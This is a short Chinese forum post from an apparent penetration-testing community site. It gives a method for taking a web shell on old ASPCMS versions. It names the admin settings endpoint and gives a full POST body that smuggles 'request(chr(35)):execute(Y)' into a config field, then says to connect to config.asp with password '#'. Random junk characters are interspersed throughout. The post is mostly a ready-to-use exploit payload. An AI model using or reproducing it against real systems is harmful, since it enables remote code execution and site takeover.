中国网络渗透测试联盟

标题: ASPCMS 老版本秒杀拿SHELL [打印本页]
作者: admin    时间: 2013-2-4 16:18
标题: ASPCMS 老版本秒杀拿SHELL
老的ASPCMS版本的秒杀拿SHELL漏洞) w7 n8 n8 S, _2 N, C
; n8 ?% _4 l' q: Z) A5 ^
找到后台。。。然后
2 o$ j/ A; o& `8 C8 F. J ! O7 v& M4 w0 Y2 {% Z
/admin/_system/AspCms_SiteSetting.asp?action=saves8 Y. }' p5 ]; M0 W3 ^' x2 r7 h- C1 {

4 h1 s# U. O. e( P! b/ @3 ]' U直接POST
' k- a' p9 k; N  o4 A
0 P6 D7 |2 R8 I' c% C( V7 `runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1, B) l0 ^6 {% i/ Z0 w& m4 B

" v/ B+ k. y$ i: `: z) l% [$ Y9 n再连接配置文件config.asp 密码为#
) Z; _, U  k6 i! H9 O



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2